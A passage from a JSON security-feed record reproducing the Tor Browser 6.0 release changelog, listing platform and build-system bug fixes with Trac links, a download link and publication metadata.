](<https://sports.yahoo.com/dailyfantasy> \"https://sports.yahoo.com/dailyfantasy\" ) page \n * [ Bug 18767 ](<https://trac.torproject.org/projects/tor/ticket/18767>) : Context menu is broken on Windows in ESR 45 based Tor Browser \n * OS X \n\n * [ Bug 6540 ](<https://trac.torproject.org/projects/tor/ticket/6540>) : Support OS X Gatekeeper \n * [ Bug 13252 ](<https://trac.torproject.org/projects/tor/ticket/13252>) : Tor Browser should not store data in the application bundle \n * [ Bug 18951 ](<https://trac.torproject.org/projects/tor/ticket/18951>) : HTTPS-E is missing after update \n * [ Bug 18904 ](<https://trac.torproject.org/projects/tor/ticket/18904>) : meek-http-helper profile not updated \n * [ Bug 18928 ](<https://trac.torproject.org/projects/tor/ticket/18928>) : Upgrade is not smooth (requires another restart) \n * Build System \n\n * All Platforms \n\n * [ Bug 18127 ](<https://trac.torproject.org/projects/tor/ticket/18127>) : Add LXC support for building with Debian guest VMs \n * [ Bug 16224 ](<https://trac.torproject.org/projects/tor/ticket/16224>) : Don't use BUILD_HOSTNAME anymore in Firefox builds \n * [ Bug 18919 ](<https://trac.torproject.org/projects/tor/ticket/18919>) : Remove unused keys and unused dependencies \n * Windows \n\n * [ Bug 17895 ](<https://trac.torproject.org/projects/tor/ticket/17895>) : Use NSIS 2.51 for installer to avoid DLL hijacking \n * [ Bug 18290 ](<https://trac.torproject.org/projects/tor/ticket/18290>) : Bump mingw-w64 commit we use \n * OS X \n\n * [ Bug 18331 ](<https://trac.torproject.org/projects/tor/ticket/18331>) : Update toolchain for Firefox 45 ESR \n * [ Bug 18690 ](<https://trac.torproject.org/projects/tor/ticket/18690>) : Switch to Debian Wheezy guest VMs \n * Linux \n\n * [ Bug 18699 ](<https://trac.torproject.org/projects/tor/ticket/18699>) : Stripping fails due to obsolete Browser/components directory \n * [ Bug 18698 ](<https://trac.torproject.org/projects/tor/ticket/18698>) : Include libgconf2-dev for our Linux builds \n * [ Bug 15578 ](<https://trac.torproject.org/projects/tor/ticket/15578>) : Switch to Debian Wheezy guest VMs (10.04 LTS is EOL) \n \n\n\n** [ Download Tor Browser 6.0 ](<https://www.torproject.org/download/download-easy.html>) **\n", "modified": "2016-06-07T22:21:01", "published": "2016-06-07T22:21:01", "id": "KITPLOIT:8825983957630982550", "href": "http://www.kitploit.com/2016/06/tor-browser-60-everything-you-need-to.html", "title": "Tor Browser 6.0 - Everything you Need to Safely Browse the Internet", "type": "kitploit", "cvss": {"score": 0.0, "vector": "NONE"}}]}